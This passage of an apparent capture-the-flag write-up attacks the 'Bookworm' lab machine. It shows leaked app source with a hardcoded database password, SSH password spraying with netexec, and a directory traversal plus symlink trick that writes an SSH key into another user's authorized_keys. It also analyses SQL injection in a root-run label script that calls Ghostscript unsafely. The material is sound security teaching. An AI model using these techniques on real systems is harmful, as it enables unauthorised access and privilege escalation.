await renderWithFlashes(req, res, "basket.njk", { entries: basket });
});
app.post("/basket/add", async (req, res) => {
const { bookId, quantity: quantityRaw } = req.body;
const quantity = parseInt(quantityRaw);
if (!req.session.user) {
await req.flash("error", "Sorry, you must be logged in to add to your basket!");
return res.redirect("/login");
}
if (isNaN(quantity) || quantity <= 0) {
await req.flash("error", "Something went wrong when adding to the basket, please try again!");
return res.redirect("/shop");
}
const book = await Book.findByPk(bookId);
if (!book) {
await req.flash("error", "We couldn't find that book, please try again!");
return res.redirect("/shop");
}
const userId = req.session.user.id;
const existingEntry = await BasketEntry.findOne({ where: { bookId, userId } });
if (existingEntry) {
existingEntry.quantity += quantity;
await existingEntry.save();
} else {
await BasketEntry.create({ bookId, userId, quantity: quantity, note: "" });
}
await req.flash("success", "Added the item to your basket!");
return res.redirect("/shop");
});
app.post("/basket/:id/delete", async (req, res) => {
const { id } = req.params;
const entry = await BasketEntry.findByPk(id);
if (!entry) {
await req.flash("error", "We can't seem to find that entry in your basket, please try again!");
return res.redirect("/basket");
}
await entry.destroy();
await req.flash("success", "Successfully deleted that item from your basket.");
return res.redirect("/basket");
});
app.post("/basket/:id/edit", async (req, res) => {
const { id } = req.params;
const { quantity: quantityRaw, note } = req.body;
const quantity = parseInt(quantityRaw);
if (isNaN(quantity)) {
await req.flash("error", "Something went wrong when adding to the basket, please try again!");
return res.redirect("/shop");
}
const entry = await BasketEntry.findByPk(id);
if (!entry) {
await req.flash("error", "We can't seem to find that entry in your basket, please try again!");
return res.redirect("/basket");
}
if (quantity <= 0) {
await entry.destroy();
} else {
entry.note = note;
entry.quantity = quantity;
await entry.save();
}
await req.flash("success", "Successfully updated that item in your basket.");
return res.redirect("/basket");
});
app.post("/checkout", async (req, res) => {
if (!req.session.user) {
await req.flash("error", "Sorry, you must be logged in to checkout!");
return res.redirect("/login");
}
const entries = await BasketEntry.findAll({ where: { userId: req.session.user.id } });
if (entries.length === 0) {
await req.flash("error", "Sorry, you must add something to your basket!");
return res.redirect("/basket");
}
const user = await User.findByPk(req.session.user.id);
const address = `${user.name}
${user.addressLine1}
${user.addressLine2}
${user.town}
${user.postcode}`.replace("\n\n", "\n");
const order = await Order.create({
userId: req.session.user.id,
shippingAddress: address,
totalPrice: 0.0,
});
let totalPrice = 0;
for (const entry of entries) {
const book = await Book.findByPk(entry.bookId);
await OrderLine.create({ orderId: order.id, bookId: entry.bookId, quantity: entry.quantity, note: entry.note });
totalPrice += book.price * entry.quantity;
await entry.destroy();
}
order.totalPrice = totalPrice;
await order.save();
await req.flash("success", "Your order has been completed!");
return res.redirect(`/order/${order.id}`);
});
app.get("/order/:id", async (req, res) => {
const { id } = req.params;
if (!req.session.user) {
await req.flash("error", "Sorry, you must be logged in to view your orders!");
return res.redirect("/login");
}
const order = await Order.findByPk(id);
if (!order || order.userId !== req.session.user.id) {
await req.flash("error", "Sorry, we can't find that order!");
return res.redirect("/profile");
}
const entries = await OrderLine.findAll({ where: { orderId: id } });
const orderDetails = order.toJSON();
orderDetails.orderLines = [];
for (const entry of entries) {
orderDetails.orderLines.push({
...entry.toJSON(),
book: await Book.findByPk(entry.bookId),
});
}
await renderWithFlashes(req, res, "order.njk", {
order: orderDetails,
bookIdsQueryParam: orderDetails.orderLines.map((x) => `bookIds=${x.bookId}`).join("&"),
});
});
app.get("/profile", async (req, res) => {
if (!req.session.user) {
await req.flash("error", "Sorry, you must be logged in to view your profile!");
return res.redirect("/login");
}
await renderWithFlashes(req, res, "profile.njk", {
user: await User.findByPk(req.session.user.id),
orders: await Order.findAll({ where: { userId: req.session.user.id } }),
});
});
app.post("/profile", async (req, res) => {
if (!req.session.user) {
await req.flash("error", "Sorry, you must be logged in to update your profile!");
return res.redirect("/login");
}
const { name, addressLine1, addressLine2, town, postcode } = req.body;
if (
name.length == 0 ||
addressLine1.length == 0 ||
addressLine2.length == 0 ||
town.length == 0 ||
postcode.length == 0
) {
await req.flash("error", "Sorry, all fields are required to be filled out!!");
return res.redirect("/login");
}
if (
name.length > 20 ||
addressLine1.length > 20 ||
addressLine2.length > 20 ||
town.length > 20 ||
postcode.length > 20
) {
await req.flash("error", "Sorry, we can't accept any data longer than 20 characters!");
return res.redirect("/login");
}
const user = await User.findByPk(req.session.user.id);
user.name = name;
user.addressLine1 = addressLine1;
user.addressLine2 = addressLine2;
user.town = town;
user.postcode = postcode;
await user.save();
await req.flash("success", "Successfully updated your profile!");
return res.redirect("/profile");
});
app.get("/download/:orderId", async (req, res) => {
const { orderId } = req.params;
if (!req.session.user) {
await req.flash("error", "Sorry, you must be logged in to download your files!");
return res.redirect("/login");
}
const order = await Order.findOne({ where: { id: orderId, userId: req.session.user.id } });
if (!order) {
await req.flash("error", "Sorry, we can't find that download!");
return res.redirect("/profile");
}
if (!order.canDownload) {
await req.flash("error", "Sorry, we can't offer downloads on this order!");
return res.redirect("/profile");
}
const { bookIds } = req.query;
if (typeof bookIds === "string") {
const fileName = `${bookIds}.pdf`;
res.download(bookIds, fileName, { root: path.join(__dirname, "books") });
} else if (Array.isArray(bookIds)) {
const arch = archiver("zip");
for (const id of bookIds) {
const fileName = (await Book.findByPk(id))?.title ?? "Unknown";
arch.file(path.join(__dirname, "books", id), { name: `${fileName}.pdf` });
}
res.attachment(`Order ${orderId}.zip`).type("zip");
arch.on("end", () => res.end()); // end response when archive stream ends
arch.pipe(res);
arch.finalize();
} else {
res.sendStatus(404);
}
});
app.post("/profile/avatar", async (req, res) => {
if (!req.session.user) {
await req.flash("error", "Sorry, you must be logged in to view your profile!");
return res.redirect("/login");
}
const file = req.files?.avatar;
if (!file) {
await req.flash("error", "Sorry, you must upload a file!");
return res.redirect("/profile");
}
if (file.mimetype !== "image/jpeg" && file.mimetype !== "image/png") {
await req.flash("error", "Sorry, you must upload a JPEG or a PNG!");
return res.redirect("/profile");
}
await file.mv(path.join(__dirname, "static", "img", "uploads", req.session.user.id.toString()));
const user = await User.findByPk(req.session.user.id);
user.avatar = `/static/img/uploads/${req.session.user.id}`;
await user.save();
res.redirect("/profile");
});
(async function () {
await sequelize.sync({ force: process.env.NODE_ENV !== "production" });
try {
const { migrate } = require("./migrate");
await migrate();
} catch {
console.log("Skipping database initialisation as import failed");
}
app.listen(port, process.env.NODE_ENV === "production" ? "127.0.0.1" : "0.0.0.0", async () => {
console.log(`Bookworm listening on port ${port}`);
});
})();
There’s a lot here to look at, but what ends up being interesting is the local import of database.js:
const { sequelize, User, Book, BasketEntry, Order, OrderLine } = require("./database");
I’ll pull that:
const { Sequelize, Model, DataTypes } = require("sequelize");
//const sequelize = new Sequelize("sqlite::memory::");
const sequelize = new Sequelize(
process.env.NODE_ENV === "production"
? {
dialect: "mariadb",
dialectOptions: {
host: "127.0.0.1",
user: "bookworm",
database: "bookworm",
password: "FrankTh3JobGiver",
},
logging: false,
}
: "sqlite::memory::"
);
const User = sequelize.define("User", {
name: {
type: DataTypes.STRING(20),
allowNull: false,
},
username: {
type: DataTypes.STRING(20),
unique: true,
allowNull: false,
},
password: {
type: DataTypes.STRING(32),
allowNull: false,
},
avatar: {
type: DataTypes.STRING,
allowNull: false,
},
addressLine1: {
type: DataTypes.STRING(20),
allowNull: false,
},
addressLine2: {
type: DataTypes.STRING(20),
allowNull: false,
},
town: {
type: DataTypes.STRING(20),
allowNull: false,
},
postcode: {
type: DataTypes.STRING(20),
allowNull: false,
},
});
const BasketEntry = sequelize.define("BasketEntry", {
userId: DataTypes.INTEGER,
bookId: DataTypes.INTEGER,
quantity: DataTypes.INTEGER,
note: DataTypes.STRING,
});
const Book = sequelize.define("Book", {
title: DataTypes.STRING,
description: DataTypes.TEXT,
price: DataTypes.DECIMAL,
image: DataTypes.STRING,
author: DataTypes.STRING,
upc: DataTypes.STRING,
publishDate: DataTypes.DATEONLY,
language: DataTypes.STRING,
});
const Order = sequelize.define("Order", {
userId: DataTypes.INTEGER,
shippingAddress: DataTypes.TEXT,
totalPrice: DataTypes.DECIMAL,
canDownload: {
type: DataTypes.BOOLEAN,
allowNull: false,
defaultValue: false,
},
});
const OrderLine = sequelize.define("OrderLine", {
orderId: DataTypes.INTEGER,
bookId: DataTypes.INTEGER,
quantity: DataTypes.INTEGER,
note: DataTypes.STRING,
});
module.exports = {
sequelize,
User,
Book,
BasketEntry,
Order,
OrderLine,
};
There’s creds at the top.
I’ve got three usernames from the passwd file, and now another username and password from the database. netexec (formerly crackmapexec) is a quick way to check if any work over SSH. I like to include --continue-on-success to see if multiple users might use that password:
oxdf@hacky$ netexec ssh bookworm.htb -u users.txt -p FrankTh3JobGiver --continue-on-success
SSH 10.10.11.215 22 bookworm.htb [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9
SSH 10.10.11.215 22 bookworm.htb [+] frank:FrankTh3JobGiver - shell access!
SSH 10.10.11.215 22 bookworm.htb [-] neil:FrankTh3JobGiver Authentication failed.
SSH 10.10.11.215 22 bookworm.htb [-] james:FrankTh3JobGiver Authentication failed.
SSH 10.10.11.215 22 bookworm.htb [-] bookworm:FrankTh3JobGiver Authentication failed.
It works for frank, and I’m able to get a shell:
oxdf@hacky$ sshpass -p FrankTh3JobGiver ssh frank@bookworm.htb
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64)
...[snip]...
frank@bookworm:~$
And user.txt:
frank@bookworm:~$ cat user.txt
067130be************************
frank’s home directory is very empty:
frank@bookworm:~$ ls -la
total 36
drwxr-xr-x 5 frank frank 4096 May 24 2023 .
drwxr-xr-x 5 root root 4096 Jun 5 2023 ..
lrwxrwxrwx 1 root root 9 Jan 30 2023 .bash_history -> /dev/null
-rw-r--r-- 1 frank frank 220 Jan 30 2023 .bash_logout
-rw-r--r-- 1 frank frank 3771 Jan 30 2023 .bashrc
drwx------ 2 frank frank 4096 May 3 2023 .cache
drwxrwxr-x 3 frank frank 4096 May 3 2023 .local
lrwxrwxrwx 1 root root 9 Jan 30 2023 .mysql_history -> /dev/null
-rw-r--r-- 1 frank frank 807 Jan 30 2023 .profile
drwx------ 2 frank frank 4096 May 3 2023 .ssh
-rw-r----- 1 root frank 33 Jan 17 11:14 user.txt
There are two other home directories. frank can’t access james’s, but can access neil’s:
frank@bookworm:/home$ ls
frank james neil
frank@bookworm:/home$ cd james/
-bash: cd: james/: Permission denied
frank@bookworm:/home$ cd neil/
frank@bookworm:/home/neil$
There’s an interesting directory, converter
, which seems to hold another JavaScript web application:
frank@bookworm:/home/neil$ ls -la
total 36
drwxr-xr-x 6 neil neil 4096 May 3 2023 .
drwxr-xr-x 5 root root 4096 Jun 5 2023 ..
lrwxrwxrwx 1 root root 9 Jan 30 2023 .bash_history -> /dev/null
-rw-r--r-- 1 neil neil 220 Jan 30 2023 .bash_logout
-rw-r--r-- 1 neil neil 3771 Jan 30 2023 .bashrc
drwx------ 2 neil neil 4096 May 3 2023 .cache
drwxr-xr-x 3 neil neil 4096 May 3 2023 .config
drwxr-xr-x 7 root root 4096 May 3 2023 converter
lrwxrwxrwx 1 root root 9 Jan 30 2023 .mysql_history -> /dev/null
-rw-r--r-- 1 neil neil 807 Jan 30 2023 .profile
drwx------ 2 neil neil 4096 Dec 5 19:56 .ssh
frank@bookworm:/home/neil$ ls converter/
calibre index.js node_modules output package.json package-lock.json processing templates
There are services listening on 3000 and 3001:
frank@bookworm:/home/neil/converter$ netstat -tnlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3001 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
The service on 127.0.0.1:3000
is just the server behind port 80:
frank@bookworm:/home/neil/converter$ curl localhost -H "Host: bookworm.htb" -s | md5sum
e529bcdf6b4a465a3f179a2baddf36cc -
frank@bookworm:/home/neil/converter$ curl localhost:3000 -s | md5sum
e529bcdf6b4a465a3f179a2baddf36cc -
The source shows that converter
runs on 3001:
const app = express();
const port = 3001;
...[snip]...
app.listen(port, "127.0.0.1", () => {
console.log(`Development converter listening on port ${port}`);
});
Looking for potential services that might launch this, it’s interesting that there are three that I can’t read:
frank@bookworm:/home/neil/converter$ grep -r 3001 /etc/systemd/
grep: /etc/systemd/system/bot.service: Permission denied
grep: /etc/systemd/system/devserver.service: Permission denied
grep: /etc/systemd/system/bookworm.service: Permission denied
It seems likely that bookworm.service is the main website and bot.service is the bot that interacts with the XSS. That would leave devserver.service as potentially the converter?
It seems this is running as neil:
frank@bookworm:/home/neil/converter/calibre$ ps auxww | grep neil
neil 1691 0.0 1.3 608368 54224 ? Ssl 11:14 0:00 /usr/bin/node index.js
frank@bookworm:/proc/1691$ ls -l
ls: cannot read symbolic link 'cwd': Permission denied
ls: cannot read symbolic link 'root': Permission denied
ls: cannot read symbolic link 'exe': Permission denied
total 0
-r--r--r-- 1 neil neil 0 Jan 17 15:22 arch_status
dr-xr-xr-x 2 neil neil 0 Jan 17 11:14 attr
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 autogroup
-r-------- 1 neil neil 0 Jan 17 15:22 auxv
-r--r--r-- 1 neil neil 0 Jan 17 11:14 cgroup
--w------- 1 neil neil 0 Jan 17 15:22 clear_refs
-r--r--r-- 1 neil neil 0 Jan 17 11:14 cmdline
-rw-r--r-- 1 neil neil 0 Jan 17 11:14 comm
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 coredump_filter
-r--r--r-- 1 neil neil 0 Jan 17 15:22 cpuset
lrwxrwxrwx 1 neil neil 0 Jan 17 15:22 cwd
-r-------- 1 neil neil 0 Jan 17 15:22 environ
lrwxrwxrwx 1 neil neil 0 Jan 17 11:14 exe
dr-x------ 2 neil neil 0 Jan 17 11:14 fd
dr-x------ 2 neil neil 0 Jan 17 15:22 fdinfo
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 gid_map
-r-------- 1 neil neil 0 Jan 17 15:22 io
-r--r--r-- 1 neil neil 0 Jan 17 15:22 limits
-rw-r--r-- 1 neil neil 0 Jan 17 11:14 loginuid
dr-x------ 2 neil neil 0 Jan 17 15:22 map_files
-r--r--r-- 1 neil neil 0 Jan 17 11:14 maps
-rw------- 1 neil neil 0 Jan 17 15:22 mem
-r--r--r-- 1 neil neil 0 Jan 17 15:22 mountinfo
-r--r--r-- 1 neil neil 0 Jan 17 15:22 mounts
-r-------- 1 neil neil 0 Jan 17 15:22 mountstats
dr-xr-xr-x 54 neil neil 0 Jan 17 15:22 net
dr-x--x--x 2 neil neil 0 Jan 17 15:22 ns
-r--r--r-- 1 neil neil 0 Jan 17 15:22 numa_maps
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 oom_adj
-r--r--r-- 1 neil neil 0 Jan 17 15:22 oom_score
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 oom_score_adj
-r-------- 1 neil neil 0 Jan 17 15:22 pagemap
-r-------- 1 neil neil 0 Jan 17 15:22 patch_state
-r-------- 1 neil neil 0 Jan 17 15:22 personality
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 projid_map
lrwxrwxrwx 1 neil neil 0 Jan 17 15:22 root
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 sched
-r--r--r-- 1 neil neil 0 Jan 17 15:22 schedstat
-r--r--r-- 1 neil neil 0 Jan 17 11:14 sessionid
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 setgroups
-r--r--r-- 1 neil neil 0 Jan 17 15:22 smaps
-r--r--r-- 1 neil neil 0 Jan 17 15:22 smaps_rollup
-r-------- 1 neil neil 0 Jan 17 15:22 stack
-r--r--r-- 1 neil neil 0 Jan 17 11:14 stat
-r--r--r-- 1 neil neil 0 Jan 17 15:22 statm
-r--r--r-- 1 neil neil 0 Jan 17 11:14 status
-r-------- 1 neil neil 0 Jan 17 15:22 syscall
dr-xr-xr-x 9 neil neil 0 Jan 17 15:22 task
-r--r--r-- 1 neil neil 0 Jan 17 15:22 timers
-rw-rw-rw- 1 neil neil 0 Jan 17 15:22 timerslack_ns
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 uid_map
-r--r--r-- 1 neil neil 0 Jan 17 15:22 wchan
Everything in the /proc directory for this process is owned by neil.
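That ownership follows from how procfs works: each /proc/&lt;pid&gt; entry is owned by the user the process runs as, so stat-ing the directory identifies the owner even without read access inside it. A sketch using the current process as a stand-in for PID 1691:

```python
import os
import pwd

# procfs entries for a process are owned by the user it runs as, so stat-ing
# the directory reveals the owner even when its contents are unreadable.
pid_dir = "/proc/self"  # stand-in for /proc/1691 from above
owner = pwd.getpwuid(os.stat(pid_dir).st_uid).pw_name
print(owner)
```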
First I want to take a look at the site. I’ll use my SSH session to get a tunnel (-L 3001:localhost:3001) so I can load it in my browser. It’s a page to convert files:
The source shows two routes:
const convertEbook = path.join(__dirname, "calibre", "ebook-convert");

app.get("/", (req, res) => {
  const { error } = req.query;
  res.render("index.njk", { error: error === "no-file" ? "Please specify a file to convert." : "" });
});

app.post("/convert", async (req, res) => {
  const { outputType } = req.body;
  if (!req.files || !req.files.convertFile) {
    return res.redirect("/?error=no-file");
  }
  const { convertFile } = req.files;
  const fileId = uuidv4();
  const fileName = `${fileId}${path.extname(convertFile.name)}`;
  const filePath = path.resolve(path.join(__dirname, "processing", fileName));
  await convertFile.mv(filePath);
  const destinationName = `${fileId}.${outputType}`;
  const destinationPath = path.resolve(path.join(__dirname, "output", destinationName));
  console.log(filePath, destinationPath);
  const converter = child.spawn(convertEbook, [filePath, destinationPath], {
    timeout: 10_000,
  });
  converter.on("close", (code) => {
    res.sendFile(path.resolve(destinationPath));
  });
});
/ just shows the form. /convert takes input and calls ./calibre/ebook-convert.
Running this with -h shows the help:
frank@bookworm:/home/neil/converter/calibre$ ./ebook-convert -h
Usage: ebook-convert input_file output_file [options]
Convert an e-book from one format to another.
input_file is the input and output_file is the output. Both must be specified as the first two arguments to the command.
The output e-book format is guessed from the file extension of output_file. output_file can also be of the special format .EXT where EXT is the output file extension. In this case, the name of the output file is derived from the name of the input file. Note that the filenames must not start with a hyphen. Finally, if output_file has no extension, then it is treated as a folder and an "open e-book" (OEB) consisting of HTML files is written to that folder. These files are the files that would normally have been passed to the output plugin.
After specifying the input and output file you can customize the conversion by specifying various options. The available options depend on the input and output file types. To get help on them specify the input and output file and then use the -h option.
For full documentation of the conversion system see
https://manual.calibre-ebook.com/conversion.html
Whenever you pass arguments to ebook-convert that have spaces in them, enclose the arguments in quotation marks. For example: "/some path/with spaces"
Options:
--version show program's version number and exit
-h, --help show this help message and exit
--list-recipes List builtin recipe names. You can create an e-book from a
builtin recipe like this: ebook-convert "Recipe Name.recipe"
output.epub
Created by Kovid Goyal <kovid@kovidgoyal.net>
It picks file formats based on the input and output extensions. If there’s no output extension, it assumes “open e-book” (OEB) format and writes the output to a folder.
There are a lot of “recipes”:
frank@bookworm:/home/neil/converter/calibre$ ./ebook-convert --list-recipes
Available recipes:
+info
.týždeň
10minutos
180.com.uy
1843
20 Minutos
20 minutes
...[snip]...
시사인 라이브
조선일보
중앙일보
한겨례
1690 recipes available
I’ll create a test file and play with different ways of converting.
frank@bookworm:/home/neil/converter/calibre$ echo "this is a test" > /tmp/test.txt
frank@bookworm:/home/neil/converter/calibre$ ./ebook-convert /tmp/test.txt /tmp/test
1% Converting input to HTML...
InputFormatPlugin: TXT Input running
on /tmp/test.txt
Language not specified
Creator not specified
Building file list...
Normalizing filename cases
Rewriting HTML links
flow is too short, not running heuristics
Forcing index.html into XHTML namespace
34% Running transforms on e-book...
Merging user specified metadata...
Detecting structure...
Auto generated TOC with 0 entries.
Flattening CSS and remapping font sizes...
Source base font size is 12.00000pt
Removing fake margins...
Cleaning up manifest...
Trimming unused files from manifest...
Creating OEB Output...
67% Running OEB Output plugin
OEB output written to /tmp/test
Output saved to /tmp/test
frank@bookworm:/home/neil/converter/calibre$ ls -l /tmp/test
total 20
-rw-rw-r-- 1 frank frank 1062 Jan 17 15:14 content.opf
-rw-rw-r-- 1 frank frank 405 Jan 17 15:14 index.html
-rw-rw-r-- 1 frank frank 51 Jan 17 15:14 page_styles.css
-rw-rw-r-- 1 frank frank 154 Jan 17 15:14 stylesheet.css
-rw-rw-r-- 1 frank frank 485 Jan 17 15:14 toc.ncx
It creates a directory of files when there’s no extension. If I write to another .txt, it basically copies it, adding a bunch of whitespace:
frank@bookworm:/home/neil/converter/calibre$ ./ebook-convert /tmp/test.txt /tmp/test2.txt
1% Converting input to HTML...
InputFormatPlugin: TXT Input running
on /tmp/test.txt
Language not specified
Creator not specified
Building file list...
Normalizing filename cases
Rewriting HTML links
flow is too short, not running heuristics
Forcing index.html into XHTML namespace
34% Running transforms on e-book...
Merging user specified metadata...
Detecting structure...
Auto generated TOC with 0 entries.
Flattening CSS and remapping font sizes...
Source base font size is 12.00000pt
Removing fake margins...
Cleaning up manifest...
Trimming unused files from manifest...
Creating TXT Output...
67% Running TXT Output plugin
Converting XHTML to TXT...
TXT output written to /tmp/test2.txt
Output saved to /tmp/test2.txt
frank@bookworm:/home/neil/converter/calibre$ cat /tmp/test2.txt
this is a test
When I submit a file for convert via the website, the POST request looks like (with some unnecessary headers removed):
POST /convert HTTP/1.1
Host: 127.0.0.1:3001
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Type: multipart/form-data; boundary=---------------------------416641782035355546973084316586
Content-Length: 473
Origin: http://127.0.0.1:3001
Connection: close
Referer: http://127.0.0.1:3001/
Cookie: lang=en-US
-----------------------------416641782035355546973084316586
Content-Disposition: form-data; name="convertFile"; filename="test.txt"
Content-Type: text/plain
test data
-----------------------------416641782035355546973084316586
Content-Disposition: form-data; name="outputType"
pdf
-----------------------------416641782035355546973084316586--
The output filename is generated here:
const destinationName = `${fileId}.${outputType}`;
const destinationPath = path.resolve(path.join(__dirname, "output", destinationName));
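To see why that construction is dangerous, here’s a quick Python sketch of the equivalent logic (the base directory is made up for illustration): when I control outputType, the “extension” can walk back out of the output directory.

```python
import os.path

# Hypothetical mirror of the Node logic above: name = fileId + "." + outputType,
# resolved under an output directory. The base path is invented for the demo.
def destination(file_id, output_type, base="/srv/converter"):
    name = f"{file_id}.{output_type}"
    return os.path.abspath(os.path.join(base, "output", name))

print(destination("abc123", "txt"))
# /srv/converter/output/abc123.txt
print(destination("abc123", "/../../../../tmp/web.txt"))
# /tmp/web.txt -- the "extension" escapes the output directory
```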
That also looks like a directory traversal vulnerability. I’ll try updating this in Burp Repeater:
It shows success, and the file exists:
frank@bookworm:/home/neil/converter/calibre$ cat /tmp/web.txt
test data!
If I can get write as neil, I would want to write an SSH key into their authorized_keys file. But that has no extension, which by default means ebook-convert would create a directory, which is not useful.
To write a text file without a .txt extension, I’ll try a symlink:
frank@bookworm:/home/neil/converter/calibre$ ln -s /tmp/output /tmp/output.txt
frank@bookworm:/home/neil/converter/calibre$ ./ebook-convert /tmp/test.txt /tmp/output.txt
1% Converting input to HTML...
InputFormatPlugin: TXT Input running
on /tmp/test.txt
Language not specified
Creator not specified
Building file list...
Normalizing filename cases
Rewriting HTML links
flow is too short, not running heuristics
Forcing index.html into XHTML namespace
34% Running transforms on e-book...
Merging user specified metadata...
Detecting structure...
Auto generated TOC with 0 entries.
Flattening CSS and remapping font sizes...
Source base font size is 12.00000pt
Removing fake margins...
Cleaning up manifest...
Trimming unused files from manifest...
Creating TXT Output...
67% Running TXT Output plugin
Converting XHTML to TXT...
TXT output written to /tmp/output.txt
Output saved to /tmp/output.txt
frank@bookworm:/home/neil/converter/calibre$ cat /tmp/output
this is a test
It worked! I wrote text to /tmp/output.
Moving to the web, I’ll create a new symlink to test:
frank@bookworm:/home/neil/converter/calibre$ ln -s /tmp/outweb /tmp/outweb.txt
When I send the same payload targeting /tmp/outweb.txt, it fails:
The issue here is symlink protection, controlled by the fs.protected_symlinks kernel option:
When set to “1” symlinks are permitted to be followed only when outside a sticky world-writable directory, or when the uid of the symlink and follower match, or when the directory owner matches the symlink’s owner.
Because the link is in a sticky, world-writable directory (/tmp) and the uid of the symlink (frank) matches neither the follower (neil) nor the directory owner (root), the kernel refuses to follow the link and the conversion fails. frank doesn’t have permission to check whether this is enabled:
frank@bookworm:/home/neil/converter/calibre$ cat /proc/sys/fs/protected_symlinks
cat: /proc/sys/fs/protected_symlinks: Permission denied
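The quoted rule can be paraphrased as a small predicate. This is just a sketch, with invented uids for frank (1001), neil (1002), and root (0):

```python
def symlink_followed(in_sticky_world_writable, link_uid, follower_uid, dir_owner_uid):
    """Paraphrase of the fs.protected_symlinks=1 rule quoted above."""
    if not in_sticky_world_writable:
        return True  # restriction only applies inside sticky world-writable dirs
    # inside such a dir, follow only if the follower or dir owner matches the link owner
    return follower_uid == link_uid or dir_owner_uid == link_uid

# /tmp (sticky, world-writable, owned by root): frank's link, neil following
print(symlink_followed(True, link_uid=1001, follower_uid=1002, dir_owner_uid=0))      # False
# frank's home directory: not a sticky world-writable dir, so it's allowed
print(symlink_followed(False, link_uid=1001, follower_uid=1002, dir_owner_uid=1001))  # True
```

This predicts exactly what happens next: a link in frank’s home directory should be followed.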
To test this theory, I’ll write a symlink in frank’s home directory instead:
frank@bookworm:~$ ln -s /tmp/outweb outweb.txt
It still points at /tmp/outweb. When I send the request to the site, it returns 200:
And the data is in /tmp/outweb, owned by neil:
frank@bookworm:~$ ls -l /tmp/outweb
-rw-r--r-- 1 neil neil 16 Jan 17 16:37 /tmp/outweb
frank@bookworm:~$ cat /tmp/outweb
test data!
That looks like arbitrary write as neil.
From frank’s home directory, I’ll write a new link pointing to neil’s authorized_keys file:
frank@bookworm:~$ ln -s /home/neil/.ssh/authorized_keys pwn.txt
I’ll send my public SSH key targeting the link:
Now when I try to SSH as neil, it works:
oxdf@hacky$ ssh -i ~/keys/ed25519_gen neil@bookworm.htb
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64)
...[snip]...
neil@bookworm:~$
neil is able to run the genlabel script as root:
neil@bookworm:~$ sudo -l
Matching Defaults entries for neil on bookworm:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User neil may run the following commands on bookworm:
(ALL) NOPASSWD: /usr/local/bin/genlabel
Only root can run it, and it takes an order id:
neil@bookworm:~$ genlabel
-bash: /usr/local/bin/genlabel: Permission denied
neil@bookworm:~$ sudo genlabel
Usage: genlabel [orderId]
When run, it generates a .pdf and a PostScript (.ps) file:
neil@bookworm:~$ sudo genlabel 5
Fetching order...
Generating PostScript file...
Generating PDF (until the printer gets fixed...)
Documents available in /tmp/tmp7wvrduelprintgen
neil@bookworm:~$ ls /tmp/tmp7wvrduelprintgen/
output.pdf output.ps
I’ll scp that to my host, and open it to see a label:
genlabel is actually a Python script. It connects to the DB as the bookworm user, just like the website:
with open("/usr/local/labelgeneration/dbcreds.txt", "r") as cred_file:
db_password = cred_file.read().strip()
cnx = mysql.connector.connect(user='bookworm', password=db_password,
host='127.0.0.1',
database='bookworm')
It uses the input order id to query the DB:
cursor = cnx.cursor()
query = "SELECT name, addressLine1, addressLine2, town, postcode, Orders.id as orderId, Users.id as userId FROM Orders LEFT JOIN Users On Orders.userId = Users.id WHERE Orders.id = %s" % sys.argv[1]
cursor.execute(query)
The order id is inserted with % string formatting rather than bound as a query parameter, so it’s vulnerable to SQL injection.
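The problem is visible without a database: with % formatting, the argument is pasted verbatim into the SQL text. A minimal sketch:

```python
# Sketch of the vulnerable formatting only -- no database required.
query_template = ("SELECT name, addressLine1, addressLine2, town, postcode, "
                  "Orders.id as orderId, Users.id as userId "
                  "FROM Orders LEFT JOIN Users On Orders.userId = Users.id "
                  "WHERE Orders.id = %s")

print(query_template % "5")
print(query_template % "99999 UNION SELECT 1,2,3,4,5,6,7")  # payload lands in the SQL
```

With mysql.connector, cursor.execute(query, (order_id,)) would instead have the driver bind %s as a parameter, neutralizing the injection.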
It creates a postscript file from a template and replaces some template strings with the data from the DB:
temp_dir = tempfile.mkdtemp("printgen")
postscript_output = os.path.join(temp_dir, "output.ps")
# Temporary until our virtual printer gets fixed
pdf_output = os.path.join(temp_dir, "output.pdf")
with open("/usr/local/labelgeneration/template.ps", "r") as postscript_file:
file_content = postscript_file.read()
generated_ps = ""
print("Fetching order...")
for (name, address_line_1, address_line_2, town, postcode, order_id, user_id) in cursor:
file_content = file_content.replace("NAME", name) \
.replace("ADDRESSLINE1", address_line_1) \
.replace("ADDRESSLINE2", address_line_2) \
.replace("TOWN", town) \
.replace("POSTCODE", postcode) \
.replace("ORDER_ID", str(order_id)) \
.replace("USER_ID", str(user_id))
print("Generating PostScript file...")
with open(postscript_output, "w") as postscript_file:
postscript_file.write(file_content)
Finally it uses subprocess to run ps2pdf on the file and generate a PDF:
print("Generating PDF (until the printer gets fixed...)")
output = subprocess.check_output(["ps2pdf", "-dNOSAFER", "-sPAPERSIZE=a4", postscript_output, pdf_output])
if output != b"":
print("Failed to convert to PDF")
print(output.decode())
print("Documents available in", temp_dir)
os.chmod(postscript_output, 0o644)
os.chmod(pdf_output, 0o644)
os.chmod(temp_dir, 0o755)
# Currently waiting for third party to enable HTTP requests for our on-prem printer
# response = requests.post("http://printer.bookworm-internal.htb", files={"file": open(postscript_output)})
The -dNOSAFER flag is passed to ps2pdf, which, according to the Ghostscript docs, means:
